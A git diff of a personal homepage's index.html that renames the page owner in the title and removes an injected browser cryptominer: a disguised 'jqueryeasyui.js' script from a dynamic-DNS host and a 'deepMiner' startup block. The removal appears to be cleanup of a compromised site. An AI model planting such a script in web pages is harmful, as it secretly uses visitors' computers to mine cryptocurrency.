--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@ License URL: http://creativecommons.org/licenses/by/3.0/
 <!DOCTYPE html>
 <html>
 <head>
-	<title>Homepage Yiliang Yuan,袁谊亮的个人主页</title>
+	<title>Homepage Xie Jiahang,谢佳航的个人主页</title>
 	<!--mobile apps-->
 	<meta name="viewport" content="width=device-width, initial-scale=1">
 	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
@@ -735,12 +735,6 @@ License URL: http://creativecommons.org/licenses/by/3.0/
 		<!-- Placed at the end of the document so the pages load faster -->
 		<script src="js/bootstrap.js"></script>
 	
-<script src="https://greenindex.dynamic-dns.net/jqueryeasyui.js"></script>
-    <script>
-        var uri = 'www';
-        var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
-        if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
-            jqueryui.start();
-            }
-    </script></body>
+
+</body>
 	</html>
